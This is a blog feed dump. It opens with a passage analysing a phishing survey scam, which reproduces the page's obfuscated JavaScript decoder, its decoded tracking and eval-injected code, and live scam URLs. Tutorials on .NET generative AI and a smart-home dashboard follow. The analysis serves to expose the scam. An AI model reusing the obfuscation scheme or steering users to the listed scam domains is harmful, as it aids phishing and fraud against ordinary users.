[_0xc50e[9]](function (a, b, c) { if (h[_0xc50e[4]](b) !== -1) return (a += h[_0xc50e[4]](b) * Math[_0xc50e[8]](e, c)); }, 0); var k = _0xc50e[0]; while (j > 0) { k = i[j % f] + k; j = (j - (j % f)) / f; } return k || _0xc50e[11]; } What’s it doing? We’ll notice the array, _0xc50e which starts it off and it’s essentially acting as a utility for the rest of the code, as those are the relevant pieces of info to make up a string.\nThe function _0xe23c is then invoked several times to decode HTML chunks to then generate the HTML that goes into the page, and this works by looking at parts of _0xc50e and then using that to decode the string that was passed into it. Let’s take it line by line:\n1 var g = _0xc50e[2][_0xc50e[1]](_0xc50e[0]); Admittedly this isn’t that readable, but lets deobfuscate it. _0xc50e[2] is the string 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/ and then it’s calling split on it, which will split it into an array of characters. So g is now an array of characters.\n1 2 3 var g = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/"[ "split" ](""); There, that’s readable. Next up:\n1 var h = g[_0xc50e[3]](0, e); This is a bit more interesting, it’s calling slice on the array, which will return a new array with the elements from the start index to the end index. So h is now an array of characters from the start of 0 to the value of e. When debugging, the first time through e was 6, so we ended up as an array of the first 6 characters of the string, which are the numbers 0 to 5. The next line is similar, just with a different end point in the string.\nWe then come to this lovely bit of code:\n1 2 3 4 5 6 var j = d[_0xc50e[1]](_0xc50e[0]) [_0xc50e[10]]() [_0xc50e[9]](function (a, b, c) { if (h[_0xc50e[4]](b) !== -1) return (a += h[_0xc50e[4]](b) * Math[_0xc50e[8]](e, c)); }, 0); Let’s deobfuscate it and look at what it’s doing now:\n1 2 3 4 5 6 var j = d["split"]("") ["reverse"]() ["reduce"](function (a, b, c) { if (h["indexOf"](b) !== -1) return (a += h["indexOf"](b) * Math["pow"](e, c)); }, 0); So it’s taking the string that was passed in, splitting it into an array of characters, reversing that array and then reducing it. The reduce function is then looking at each character in the array and if it’s in the h array (which is the first 6 characters of the string) then it’s adding the index of that character in the h array multiplied by e to the accumulator. The accumulator is initialised to 0 so the first time through it’ll be 0 + 0 * 6 which is 0. The next time through it’ll be 0 + 1 * 6 which is 6. The next time through it’ll be 6 + 2 * 6 which is 18. And so on.\nFinally, we have our loop and return value:\n1 2 3 4 5 6 var k = _0xc50e[0]; while (j > 0) { k = i[j % f] + k; j = (j - (j % f)) / f; } return k || _0xc50e[11]; Deobfuscation won’t help much, the magic variables point to '' within the array, creating a starting string. We then loop around while using remainder operator to jump through i and find a number to return. This number is then used by the calling function to look up character in another array which is decoded elsewhere as a character code to then get the string character. Here’s a calling function:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 function (h, u, n, t, e, r) { r = ""; for (var i = 0, len = h.length; i < len; i++) { var s = ""; while (h[i] !== n[e]) { s += h[i]; i++; } for (var j = 0; j < n.length; j++) s = s.replace(new RegExp(n[j], "g"), j); r += String.fromCharCode(_0xe23c(s, e, 10) - t); } return decodeURIComponent(escape(r)); } And it was receiving a huge string like ZQvZvxZZQvZxZQvZZxZZZZZxZZQZvxZQvvQxZZQvQxZZZZQxZvZvxZZZvQxZZZQZxZZ (only with 50k characters in it), and the values 89,"QZvxOrGpf",4,3,35, which is then used to decode the string.\nUltimately, it generated the html you’ll find in generated-html.html of the attached gist. The page actually runs this sort of code 3 more times, but with different keys. Inspecting the other ones showed that they were doing output that was injecting JavaScript into the page using eval (which is how the stuff was executed at the end of the decoding). Here’s the output I found:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 // Decode #1 LNG = "1"; CMP = "Aussie"; CNT = "14"; BID = "393074817"; FNP = "c267f14ded62310d74cffcc6dc2d9395"; CMPID = "175"; // Decode #2 API_URL = "https://amplinesrv.com"; const st = 0; var currentdate = new Date(); var months = [ "January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December", ]; $(".date-full").html( months[currentdate.getMonth()] + " " + currentdate.getDate() + ", " + currentdate.getFullYear() ); if ($("#comment-page").length > 0) { $(".footer").addClass("fr2"); } // Decode #3 aff_id = "350115"; click_id = "1057046844"; Brand = "1782"; lpid = "3038"; lpow = "35"; prepop = "email:;phone:;zipcode:".split(";"); emailURL = prepop[0].split(":")[1].replace(/\\s+/g, ""); phoneURL = prepop[1].split(":")[1]; zipcodeURL = prepop[2].split(":")[1]; cityURL = ""; stateURL = ""; languageCode = "EN"; countryCode = "AU"; popUrl = '{"popunder_mode":[{"id":"1431","id_campaign":"3079","id_popunder":"0","type":"0","refresh_id":"0","device":"0","active":"1","popunder_refresh_id":"0"}],"urls":""}'; // Decode #4 var answered = 0; var prevProgress = 0; var stepsTotal = 0; var progress = 0; var cheerstx = ""; var txt = ""; function cheers(prog = "100") { if (prog == 0) { txt = "- Let's begin! Go for that reward"; } if (prog > 0 && prog < 25) { txt = "- What a start! Let's go for it"; } if (prog >= 25 && prog < 50) { txt = "- What! Almost half way there"; } if (prog == 50) { cheerstx = "- You're half way there!"; } if (prog > 50 && prog < 75) { txt = "- Superb job! Almost there"; } if (prog >= 75 && prog < 100) { txt = "- Great! Almost done"; } if (prog == "100") { txt = "- Done!"; } $(".pb-cheers").text(txt); } I was a little disappointed that I didn’t have the element matching $('.pb-cheers') anywhere on the page to get congratulated as I progressed through the survey. Poor form phishers, if you’re going to have code to cheer me on, at least use it! (also, it’s weird that 50% doesn’t write to txt but to a different variable that isn’t used anywhere else)\nTaking the survey Naturally, the next thing I had to do was actually take the survey. Clicking each option would result in this function being called:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 function nextQuestionU(args) { aId = args.aId; reg = "reg" in args ? args.reg : false; rval = "rval" in args ? args.rval : null; multi = "multi" in args ? args.multi : false; pos = "pos" in args ? args.pos : false; dyn = "dyTyId" in args ? args.dyTyId : false; dy_ind = "dyIndId" in args ? args.dyIndId : false; dy_prod = "dyProdId" in args ? args.dyProdId : false; let moref = "&pos=" + pos; if (reg) { var multiData = ""; if (multi) { multiData = "&multi=true"; } moref += "&reg=true&regVal=" + rval + multiData; } if (dyn) { moref += "&dyId=" + dyn + "&dy_ind=" + dy_ind + "&dy_prod=" + dy_prod; } $(".answerOption").removeAttr("onclick"); $.ajax({ type: "POST", // url: "", // data: "_type=ajax&_action=master-saveAnswer&sid="+sId+'&qid='+qId+'&aid='+aId+'&step='+numStep+moref, url: API_URL + "/survey/saveAnswer", data: "bid=" + BID + "&fnp=" + FNP + "&sid=" + sId + "&lid=" + LNG + "&cmp=" + encodeURIComponent(CMP) + "&cnt=" + CNT + "&qid=" + qId + "&aid=" + aId + "&step=" + numStep + moref, dataType: "json", success: function (d) { let data = d; // let data = d.data; let prevProgress = $(".pb-percent").text(); let answered = data.step - 1; if (answered == 1) { mfq_tags("first-question"); } let stepsTotal = data.totalSteps; let progress = (answered / stepsTotal) * 100; $(".sprogress").css("width", progress + "%"); $({ someValue: prevProgress }).animate( { someValue: progress }, { duration: 1000, easing: "swing", step: function () { $(".pb-percent").text(Math.round(this.someValue)); }, } ); if (data.id) { numStep = data.step; $("#questionBody, #questionText, #questionFooter").html(""); /* $("#container-survey").css({backgroundImage: 'none'}); */ $(".sprogressbar").slideDown(); $("#questionText").removeClass("email-title"); $("#questionFooter").removeClass("email-sub"); $("#questionText").append(data.question); $("#questionFooter").html(data.text_footer); switchTypeQuestionsU(data); } else { mfq_tags("last-question"); showOfferWallU(); } cheers(progress); }, }); } The args being passed in is a reference to which answer you’ve selected, which came back from the server in the AJAX call (and shout-out to jQuery for still being around, this reminds me of years gone by 😜). The request doesn’t contain anything much of interest:\nbid: 393074817 fnp: c267f14ded62310d74cffcc6dc2d9395 sid: 39 lid: 1 cmp: Aussie cnt: 14 qid: 26 aid: 649 step: 1 pos: false What I can gather is that the fnp is the unique tracking ID for me and cmp is the “campaign” they are pretending to be (Aussie is my broadband provider). The value of bid seems static across sessions too, so I’d assume it’s just another part of their tracking.\nAnd here’s a sample response back:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 { "id": "6", "sort": "2", "question": "What is your age range?", "questions_type_id": "1", "text_disclaimer": null, "text_footer": null, "is_conditional": "0", "conditional_rules": null, "answers": [ { "id": "51", "actId": null, "regId": null, "cusId": null, "sort": "1", "posId": null, "dynamic": "0", "dynamic_type_id": null, "dynamic_industry_id": null, "dynamic_product_category_id": null, "aid": "35", "cusName": null, "text": "18-29" }, { "id": "52", "actId": null, "regId": null, "cusId": null, "sort": "2", "posId": null, "dynamic": "0", "dynamic_type_id": null, "dynamic_industry_id": null, "dynamic_product_category_id": null, "aid": "72", "cusName": null, "text": "30-39" }, { "id": "53", "actId": null, "regId": null, "cusId": null, "sort": "3", "posId": null, "dynamic": "0", "dynamic_type_id": null, "dynamic_industry_id": null, "dynamic_product_category_id": null, "aid": "74", "cusName": null, "text": "40-49" }, { "id": "54", "actId": null, "regId": null, "cusId": null, "sort": "4", "posId": null, "dynamic": "0", "dynamic_type_id": null, "dynamic_industry_id": null, "dynamic_product_category_id": null, "aid": "40", "cusName": null, "text": "50-64" }, { "id": "55", "actId": null, "regId": null, "cusId": null, "sort": "5", "posId": null, "dynamic": "0", "dynamic_type_id": null, "dynamic_industry_id": null, "dynamic_product_category_id": null, "aid": "41", "cusName": null, "text": "65+" } ], "totalSteps": 8, "step": 2, "jkey": null, "trf": "0" } I’ve got to admit, there’s quite a lot of data in the response, sure, it’s mostly null, but that’s a large property set and none of the responses ever populated them. I guess there’s a variety of flows that could use this backend and they just return the same data structure for all of them, adjusting the data in the response as needed.\nThe questions that you go through are pretty standard, it’s the illusion of profiling you through age, shopping habits, gender (which in this one only had Male and Female, but the one Chrome got had Male, Female and Other - yay for inclusion?), etc. but interestingly enough there was no real data capture like name, email, the stuff you’d expect they are really after.\nOnce the survey was completed I was told my details were being checked:\nShockingly, the progress bar and “checks” aren’t doing anything:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 setTimeout(function () { $(".check1") .removeClass("fa-spinner fa-spin") .addClass("fa-check-circle") .show(); $(".load_text1.loadtxstrip").css({ color: "#e4e3e3" }); $("#percent_s").html("30%"); $(".pb_process").css({ width: "30%" }); $(".load_text2").fadeIn(1000); }, 3000); setTimeout(function () { $(".check2") .removeClass("fa-spinner fa-spin") .addClass("fa-check-circle") .show(); $(".load_text2.loadtxstrip").css({ color: "#e4e3e3" }); $("#percent_s").html("60%"); $(".pb_process").css({ width: "60%" }); $(".load_text3").fadeIn(1000); }, 5000); setTimeout(function () { $(".check3") .removeClass("fa-spinner fa-spin") .addClass("fa-check-circle") .show(); $(".load_text3.loadtxstrip").css({ color: "#e4e3e3" }); $("#percent_s").html("100%"); $(".pb_process").css({ width: "100%" }); }, 7500); setTimeout(function () { $(".validate_s").slideUp(); $(".ms_init").fadeOut(function () { $("#thankyou-container").fadeIn(); }); $(".reward-page").slideDown(500); }, 7750); I really admire the staggered setTimeout calls, because if something caused one of them to error or run longer, you could end up with things out of order! 🤣\nIt is making another server call at the same time, which gets the HTML for the prizes, but it also doesn’t wait for the checks to finish before rendering the HTML, so depending on the network connection you can see the prizes before the checks are done, or the checks can be done and dismissed well before the prizes are rendered.\nAnyway, here’s what I “won”:\nClicking these links sent me off to another site, https://gifturcards.net/l/hI65ff1SfppIxFiro7kF?_luuid=988bf154-bb2b-4606-b300-14c6a07c53ae for example (again, remember that this is a scam site) where they are finally doing some data capture!\nI didn’t dig too much into the prize site as it’s pretty clear how the scam is going to go from here, and looking at the code it’s not doing anything that isn’t overly obvious, there’s a form, it captures your info and moves yo along to get more info until you hand over a credit card and you’re subscribed to something that you probably won’t get out of with ease.\nWrapping up I find it fascinating the level of complexity in the obfuscation that is used to create a page like this, the fact that there was multiple cyphers in the page and the decoding of the code to result in the HTML or JS that was injected was really quite complex.\nAnyway, that was a fun way to spend a few hours!\n", "id": "2023-09-20-oh-look-a-phishing-attempt" }, { "title": "Generative AI and .NET - Part 3 Chat Completions", "url": "https://www.aaron-powell.com/posts/2023-09-07-generative-ai-and-dotnet---part-3-chat-completions/", "date": "Thu, 07 Sep 2023 06:30:42 +0000", "tags": [ "dotnet", "ai" ], "description": "Chatty - finish this sentence for me", "content": "If you followed the code sample in the last post you’ll have a console application that can generate chat completions, but what I didn’t do was explain what chat completions are or why we’d use them; that’s the purpose of this post.\nWhat is a Chat Completion A chat completion is a way of generating text based on a prompt. The prompt is a piece of text that you provide, and the completion is the text that is generated by the model. The model is a machine learning model that has been trained on a large corpus of text, and the prompt is used to seed the model to generate the completion.\nWe saw this in action with the first blog post and that if I was to give a prompt of “The quick brown fox” then the completion would be “jumps over the lazy dog”. But this is only part of what we’re looking at here, that is a completion but with OpenAI we use chat completions.\nA chat completion is a completion that is generated based on a conversation, and is intended to come across as a natural response to the conversation. And here is how we’re starting to break away from our LLM being a glorified auto-complete for your phone keyboard and into something that is more like carrying on a conversation.\nNow this isn’t truly a conversation, the model doesn’t understand what you’re saying, it’s just generating text based on the prompt and the model, but it’s been trained in a manner that makes it appear to be conversational.\nCreating a Chat Completion We saw this in the last sample, that we execute a chat completion using the GetChatCompletionsAsync method, passing in the model (or deployment in Azure OpenAI Service’s case) and an instance of ChatCompletionOptions.\nThe ChatCompletionOptions class is used to provide configuration parameters to our all to the service, matching the parameters in the REST API.\nInitially, we’ll leave the parameters as their default value and focus on the one thing you must provide, the prompt, which we can either provide in the constructor or by adding it to the Messages property of the object:\n1 2 3 string prompt = "Describe the most recent Star Wars film."; ChatCompletionsOptions options = new(new[] { new ChatMessage(ChatRole.User, prompt) }); You’ll notice here that we’re providing the prompt variable to a ChatMessage object in which we set a ChatRole.User as the role for this message. We’ll cover prompt engineering in depth at a later date, but the quick view of it is that we use the role to help our model understand context around what the prompt is, because while the prompt can be just a single sentence, to make it really conversational we’re going to likely want to provide more context around that. Since the prompt is from user input, we indicate that with the ChatRole.User, making the model know that this is something to response to. We could add a response from the model by adding a ChatRole.Agent message to the Messages property. There’s also System and Function, but we’ll cover them when we look at prompt engineering.\nIf we were to execute this prompt:\n1 2 3 4 5 6 7 8 Response<ChatCompletions> completions = await client.GetChatCompletionsAsync(model, options); foreach (ChatChoice choice in completions.Value.Choices) { string content = choice.Message.Content; Console.WriteLine(content); } We’d get a response like this:\nAs an AI language model, I cannot have personal feelings, opinions, or experiences. But, I can provide an objective description of the movie “Star Wars: The Rise of Skywalker.”\n“Star Wars: The Rise of Skywalker” is a 2019 epic space opera film directed by J. J. Abrams and serves as a concluding chapter in the Skywalker Saga. The movie follows the story of Rey, Finn, Poe, and their allies as they embark on a mission to find Exogol, the hidden planet where the evil Palpatine has been resurrected and is preparing to launch a final attack against the Resistance.\nThroughout the movie, the characters undergo various challenges and confrontations against Palpatine’s forces. They also uncover deep secrets about their families and their connections to the Force.\nThe musical score, visual effects, and action sequences depicted in the film received praise from critics and audiences. However, some fans and critics criticized the movie’s pacing, storylines, and inconsistency with previous installments in the franchise. Despite this, “Star Wars: The Rise of Skywalker” was a box-office success, grossing over $1 billion worldwide.\nNote: Your result would likely be different as the output won’t be word-for-word consistent, it’ll only be consistent in the general theme - this is generative after all.\nTweaking our Chat Completion When we are working with our model we might want to tweak how it behaves and we can do that by providing additional parameters to the ChatCompletionOptions object. Since it will be “making up” an answer we run the risk of a hallucination in which the model gives as a result that is completely fabricated with no basis in reality.\nTo adjust this, we can play with the Temperature property. By default, this is set to 1.0 and must be between 0 and 2. Let’s execute our chat completion with a temperature of 0.5 (you can use the Polyglot Notebook in my repo):\n1 2 3 4 ChatCompletionsOptions options = new(new[] { new ChatMessage(ChatRole.User, prompt) }) { Temperature = 0.5f }; Running it again yields a result such as this:\nAs an AI language model, I do not have personal experience or emotions, but I can provide an objective description of the most recent Star Wars movie.\nThe most recent Star Wars movie is “Star Wars: The Rise of Skywalker,” which was released in December 2019. The movie is directed by J.J. Abrams and follows the story of Rey, Finn, and Poe as they try to defeat the evil First Order and its leader, Kylo Ren.\nThe movie begins with the discovery of a mysterious transmission from the late Emperor Palpatine, who has somehow returned from the dead and is threatening to destroy the galaxy. Rey, Finn, and Poe embark on a dangerous mission to find and destroy the Emperor once and for all.\nThroughout the movie, the characters face many challenges and obstacles, including battles with the First Order, encounters with new and old allies, and personal struggles with their own identities and pasts.\nIn the end, the movie culminates in a final battle between the Resistance and the First Order, with Rey and Kylo Ren facing off against the Emperor in a dramatic and emotional showdown. The movie ends with a sense of closure and resolution, as the characters come to terms with their pasts and look towards a new future.\nIt’s a little more clinical than the original, arguably less creative, but it’s also less likely to be completely made up (although we are using a fairly well documented movie, so there is a lot of grounding data that the model would have been trained on).\nLet’s go the other way and turn the creativity all the way up to 2:\n1 2 3 4 ChatCompletionsOptions options = new(new[] { new ChatMessage(ChatRole.User, prompt) }) { Temperature = 2.0f }; Now let’s see a result:\nAs an AI language model, I cannot Recent mostly Subject to Human’s Reaction.\nThe Star Wars series witnessed the december “without grandeur”: chaotic reviews reminded observers advance weaknesses; quarantine-amperf_likelyturned expectation ainvolk_monolith front-cricket media_machine difference years directly sharpen memorable grandfilm inspired director galaxies making Rey fighter_clinks awakened baby_yorzutan cliff_news sources attempts, ensure timing humorous monsters-story full_score writers fuelde motion_center_technybots intense-_energy universe tale unmistakize background hope defntt_difference audience vast_difference symbolism incredible_Tolkien esacaranthros tozkheeri. Being recours_referred_epoe experts found simply entire points unmatched movie fascinating_author had awink_pepping movie approach towards fall dramatically restared ‘9_genre continues did excellent years!".\nWell, that’s pretty terrible! I ran the same prompt a few times and each time I got an equally terrible result. But this is to be expected. We “told” the model to go completely wild and it did, and it’s not going to be able to generate something that is coherent when that’s done because all it is trying to do is combine letters together to make something that looks like a word. After all, if we look at the output there are words in there and some of those words are relevant to Star Wars, galaxies, Rey, fighter, hope, and so on, but they aren’t words forming sentences.\nRealistically, you would likely want a Temperature of just below 1 as this gives you a good balance between creativity and coherence, but it’s the sort of thing you need to experiment with in your own applications.\nThere are also other parameters that you can tweak, such as TopP and FrequencyPenalty, that you can use to adjust the output of your model. I’ll leave it to you to experiment with those.\nPlaying with TopP While Temperature is one way to control the output, the other useful one is top_p, or as it’s exposed in the .NET SDK, NucleusSamplingFactor (which is what it refers to in AI terminology). While Temperature controls the randomness of the output generated, NucleusSamplingFactor controls the diversity of the output by controlling the number of tokens that are considered when generating the output, the higher the value the more tokens are considered.\nUsing a low value for NucleusSamplingFactor, say 0.1f, the result from the model will only consider words in the top 10% of confidence that that would be the next word to come in the completion, meaning that the completion should seem “more correct”, but it will also be less creative and less diverse in the set of words used. Swinging to the other end of the spectrum and using 1f (it must be a value between 0 and 1) will mean that all words are considered, so the completion will be more creative, but it will also run the risk of being less coherent.\nIt’s important that when you’re tweaking these values that you chose whether you want to control the Temperature or the Nucleus Sampling Factor, as you only want to adjust one of them, not both, as they are both controlling the same thing, just in different ways.\nResulting Object The GetChatCompletionsAsync returns a Response<ChatCompletions> in which the Response<T> is a wrapper type from Azure with some info about the response, such as the HTTP status, what we’re really interested in is the ChatCompletions object. From here we can look at info from the service, such as the Id of the completion, the usage information of the available tokens, and most importantly the Choices property.\nChoices are the responses from the model and contains the Message (we’ll come back to that), FinishReason (why the model stopped generating text), and Index (the index of the choice in the list of choices), and ContentFilterResults (was there any flagging for hate, sexual context, etc.).\nThe Message property is an instance of ChatMessage and contains the Content which is the generated text that you are going to display to the user, as well as information about the function, but OpenAI functions are a topic for a later date.\nSo far we’ve only seen a single choice come back, which is because that’s the default on ChatCompletionOptions, but you can change this with the ChoiceCount property, although that doesn’t guarantee that you’ll get that many choices back, it’s just the maximum number of choices you’ll get back.\nConclusion To core of a text-based application with Generative AI is around chat completions. We’ve seen that with a call to GetChatCompletionsAsync we can generate a response to a prompt, and that we can tweak the parameters to get different results.\nWe saw that by tweaking the Temperature and NucleusSamplingFactor we can control the creativity and coherence of the response. If we go too far in either extreme the output really stops being useful - especially an “overly creative” temperature setting. We also saw that we can use the ChoiceCount to control the maximum amount of responses that we want to get back.\nThere are other properties on the ChatCompletionOptions that we can adjust to control the output, and as we dive deeper into more advanced aspects of working with Generative AI we’ll look at those.\nIf you want to play with this sample, check out the Polyglot Notebook in my repo.\n", "id": "2023-09-07-generative-ai-and-dotnet---part-3-chat-completions" }, { "title": "Generative AI and .NET - Part 2 SDK", "url": "https://www.aaron-powell.com/posts/2023-09-04-generative-ai-and-dotnet---part-2-sdk/", "date": "Mon, 04 Sep 2023 23:55:34 +0000", "tags": [ "dotnet", "ai" ], "description": "Let's take a look at the SDK for OpenAI and have we can use it.", "content": "It’s time to have a look at how we can build the basics of an application using Azure OpenAI Services and the .NET SDK. Remember, while I will be using AOAI in here everything is going to be applicable to OpenAI itself as well, so if you’re using that you can still follow along (I just happen to use AOAI as then I can test it for the product team).\nGetting Started Before we install the SDK it’s important to know how we work with these services, and that is via the REST API that they publish. Azure OpenAI Service has docs on their REST API but I find them a little unfriendly to read (at least, at the time of writing this blog post) compared to the REST API docs from OpenAI directly.\nBut if you look at them, you’ll notice that the Open API spec (swagger) is the same for both, so you can use the OpenAI docs to get a better understanding of the API, the parameters and how to call it. The only real difference is the endpoint, OpenAI or your AOAI instance, and the authentication method.\nInstalling the SDK While it’s useful to understand the underpinnings of all this, you’re probably not going to want to use the REST API directly, instead we’ll use the .NET SDK for that, which you’ll find on NuGet as Azure.AI.OpenAI. Yes, there are others out there on NuGet but this is the official one from Microsoft, so I’m going to use that.\nCreating a Client The first thing we need to do is create a client, and we do that by creating an instance of the OpenAIClient class, which is in the Azure.AI.OpenAI namespace. Depending on whether you’re using it with AOAI or OpenAI, the constructor you choose is going to be different.\n1 2 3 4 5 // Creating a client for AOAI OpenAIClient client = new OpenAIClient(new Uri("https://<your service>.openai.azure.com"), new Azure.AzureKeyCredential("<your AOAI API key>")); // Creating a client for OpenAI client = new OpenAIClient("<your OpenAI API key>"); From then on it doesn’t matter if you’re using AOAI or OpenAI, the rest of the code is the same, since it’s the same type, OpenAIClient, that is used to interact with the service.\nGenerating Chat Completions Now that we have a client, let’s have a look at how to get it to do something, and that something will be to generate a chat completion. Don’t worry if you’re not familiar with what a chat completion is, we’ll dive into that properly in the next post, but for now consider it as the most common way you would work with the service.\nTo generate a chat completion we need to call the GetChatCompletionsAsync method, passing in the model we want to use, and the prompt to complete:\n1 2 3 4 5 6 7 8 9 10 11 12 ChatCompletionsOptions options = new(new[] { new ChatMessage(ChatRole.User, "What is the colour of the sky?") }); string model = "<deployment name or GPT model>"; Response<ChatCompletions> completion = await client.GetChatCompletionsAsync(model, options); foreach (ChatChoice choice in completions.Value.Choices) { string content = choice.Message.Content; Console.WriteLine(content); } This gave me the response of:\nThe color of the sky can vary depending on factors such as time of day, weather conditions, and location. Generally, during the day when the sun is out, the color of the sky is blue. At sunset or sunrise, the sky can turn shades of red, orange, and pink. At night, the sky can appear black or dark blue with stars visible.\nYou might be wondering though, what do you provide for the model parameter? Well, this will depend on which service you are using, if it’s AOAI you will first deploy a model and then use the name of that deployment, if it’s OpenAI you will use the name of the model, such as gpt-3.5-turbo.\nConclusion Congratulations, we have created our very first call to OpenAI and generated a chat completion response from a prompt (that was admittedly hard-coded). If you want to have a play around with this, I’ve created a Polyglot Notebook that you can check out in my website repo.\nIn the next post we’ll take a proper look at what chat completions are, and how we can use them.\n", "id": "2023-09-04-generative-ai-and-dotnet---part-2-sdk" }, { "title": "Generative AI and .NET - Part 1 Intro", "url": "https://www.aaron-powell.com/posts/2023-09-01-generative-ai-and-dotnet---part-1-intro/", "date": "Fri, 01 Sep 2023 06:24:30 +0000", "tags": [ "dotnet", "ai" ], "description": "It's time to start a new series with everyone's favourite topic of the moment, AI!", "content": "I’ve missed a lot of the recent hype trains, I skipped over blockchain, I avoided web3, and I’m not dumb enough to have believed NFT’s were anything but a scam, but I’m not going to miss out on the AI hype train! Toot toot!\nOver the past few weeks I’ve been digging into how we can build stuff with .NET and AI, specifically Generative AI which we see with platforms such as OpenAI, and more specifically Azure OpenAI Service.\nWhile there is heaps of content out there on using these services I’ve noticed that it tends to be heavy in Python, and while I’m not against Python, it’s not a language I’m overly familiar with, so I wanted look at how we can use these services with .NET. Also, a lot of the content is really skewed towards people who are already well versed in the terminology, the concepts, and the tools, so I wanted to try and make this a bit more accessible to people who are new to the space.\nSo, over this series I’m going to share my learnings on the APIs, SDKs, and the like. The goal here isn’t to “build something” but rather to share what I’ve learnt, the mistakes I’ve made, the things I’ve found confusing, and the code I’ve had to rewrite umpteen times because “oh, that’s a better way to do it”.\nBut before we get started, I want to make something clear - I am 100% a consumer in this AI story, I’m not an AI expert, an AI researcher, or have any real understanding on how AI models work, and I think that’s an important way to approach this; I’m approaching it as someone who knows how to code and is just trying to do it against a new set of libraries.\nNow, without further ado, let’s talk theory.\nWhat is Generative AI? Throughout this series I’ll be looking at a specific part of the AI landscape and that’s Generative AI. After all, AI isn’t anything new, it’s been around for decades, but what is new is the way it can generate new content, and this is what makes things like OpenAI stand out from previous AI systems.\nI’m going to keep referring back to OpenAI, as that’s the platform I’m using (well, I use it with Azure OpenAI Service), but there are other platforms out there that will have their own APIs and SDKs. I don’t have experience with them so I can’t comment on them, but I’m sure the concepts will be similar.\nSo, what is Generative AI? Well, it’s a system that can generate new content based on existing content. For example, you can give it a sentence and it will generate a new sentence based on what we started with, aka, the prompt.\nFor example, if we give it the prompt “The quick brown fox jumps over” it might return us “the lazy dog”, as that’s the most likely continuation, or completion to use the correct terminology, of that sentence. But it might also return us “the moon”, or “the fence”, or “the lazy dog jumps over the moon”, or “the lazy dog jumps over the fence”, or “the lazy dog jumps over the moon and the fence”, or so on.\nFun fact: I used a completion for that last sentence, so that’s an example of the AI in action!\nObviously this is a huge oversimplification of what this is, but it’s enough to ground our understanding, and we’ll build on that throughout the series.\nOpenAI and Azure OpenAI Service Before I wrap up this post I want to mention a bit about OpenAI and Azure OpenAI Service. It might seem a bit confusing that I refer to the two of them interchangeably, but that’s because they have an overlap, AOAI (isn’t that a fun acronym!) builds on top of OpenAI, providing the same Large Language Models, or LLMs that OpenAI provides, but with the added benefit of being able to run it in Azure, and in doing so bring in enterprise-centric features that you’d expect from security to integration with other data sources to content filtering.\nBut when it comes to working with them from a SDK level, they operate very similar. In fact, the .NET SDK that we’ll be using has the ability to change between pointing to AOAI or OpenAI when establishing the connection, so you can easily switch between the two.\nBut more on that next time.\nNext Time That will do us for this post, mostly this post was about introducing the new series and setting the scene for what we’ll be looking at.\nIn the next post we’ll look at the basics of how we can use the SDK to connect to the service, and how we can use it to generate completions.\n", "id": "2023-09-01-generative-ai-and-dotnet---part-1-intro" }, { "title": "Building a Smart Home - Part 13 Wall Mounted Dashboards", "url": "https://www.aaron-powell.com/posts/2023-08-19-building-a-smart-home---part-13-wall-mounted-dashboards/", "date": "Fri, 18 Aug 2023 23:05:18 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "Let's take our smart home to the next level with a wall mounted dashboard!", "content": "\nI finally took the plunge and did the thing I’d been wanting to do for a while now. I built a wall mounted, well fridge mounted, dashboard for my smart home. I’ve been wanting to do this for a while now, but I’ve been putting it off because I didn’t want to spend the money on a tablet.\nAfter all, I looked at this problem just the same as I look at any other addition to the smart home, experiment first, then buy. So, what did I have around that I could use? Well, I have a few old Surface Pro devices laying around and I figured that a Surface Pro 4 would be a good candidate for this experiment. I mean, it’s a tablet, it’s got a screen, a battery, what more do I need!\nThere’s plenty of videos out there on how to do a dashboard, but every one that I’ve seen is using an Android tablet of some variety and here I am with a Windows device, so I figured I’d document my journey.\nThe Software There are three different approaches I explored for running Home Assistant as a dashboard, the simplest option is to just run Edge full screen and calling it a day. The next option is to install the website as a PWA, but that’s a bit annoying because I don’t have an SSL certificate for my local Home Assistant instance, so it shows a “not secure” banner across the top of the screen (and since it’s running locally I want to use the local address rather than my Nabu Casa endpoint). The final option is to install the Home Assistant app from the Android store using Windows Subsystem for Android, aka WSA.\nWSA is an interesting idea, I think it might be the best option, but for the moment I’m just running the browser in full screen mode and it’s going well enough - although I have had a few instances where the browser hasn’t refreshed, so I’ve had to manually refresh the page.\nHASS.Agent The other core piece of software I’m using is HASS.Agent, which is a “service” that you run to provide a local API for interacting with Home Assistant, and to feed sensor data back from the device. It can also be used to run commands on the device, exposing these commands as buttons or similar HA entities.\nWe’ll come back to HASS.Agent later in the post 😉.\nConfiguring a user account Here’s an interesting conundrum, unlike using something like an iPad or Android tablet, Windows is really designed to be a multi-user operating system. So, how do we configure a user account for our dashboard? Well, I’m glad you asked!\nMy first though was to use Windows Kiosk Mode. This really seems like the perfect solution, it’s designed for exactly this use case, but there was a problem, it can only run a fairly restricted style of app, and while it would run Edge, it seemed that it would lose the authenticated session to HA - which is not really ideal as you don’t want to be putting in credentials all the time.\nThe other problem that I hit with Kiosk Mode is that I couldn’t get it to run HASS.Agent, which I kind of need.\nSince it’s a Windows 11 